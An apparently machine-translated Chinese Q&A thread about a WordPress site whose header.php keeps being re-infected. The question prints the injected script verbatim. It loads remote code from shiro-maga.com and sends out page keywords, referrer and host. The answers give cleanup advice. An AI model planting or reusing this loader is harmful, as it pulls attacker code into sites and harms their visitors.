header.php中腳本的來源

Question

我的網站是wordpress網站。 以下代碼每隔幾個小時出現在Header.php中，當我刪除它時，它會在幾個小時后再次出現。 請注意，代碼“ shiro-maga.com”中的鏈接每次都會更改。 代碼如下：

 <script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://shiro-maga.com/js/jquery.min.php?c_utt=G91825&c_utm='+encodeURIComponent('http://shiro-maga.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script> 

我相信該主題已被感染“掃描顯示沒有惡意軟件”，因此它生成了此腳本。 您能否建議如何找到此腳本的來源？

謝謝

Answer 1

絕對是惡意的。 您的網站已被盜用。 您可以使用下面的詳細文章來查找和刪除感染源。 http://ottopress.com/2009/hacked-wordpress-backdoors/ 。 像Windows Grep這樣的程序將幫助您快速掃描所有主題文件中的關鍵字，例如eval和base64。 從主題中刪除所有可疑的代碼ing，然后更新WordPress核心文件，以確保您運行的是干凈版本。 另外，如果您有備份，請還原主題的備份，並使用全新的WP更新版本來更新您的網站。

Answer 2

防止重新感染的快速解決方案是將CHMOD header.php設置為444 （只讀）。 該站點可以正常工作，不會被重新感染，從而使您有時間發現感染。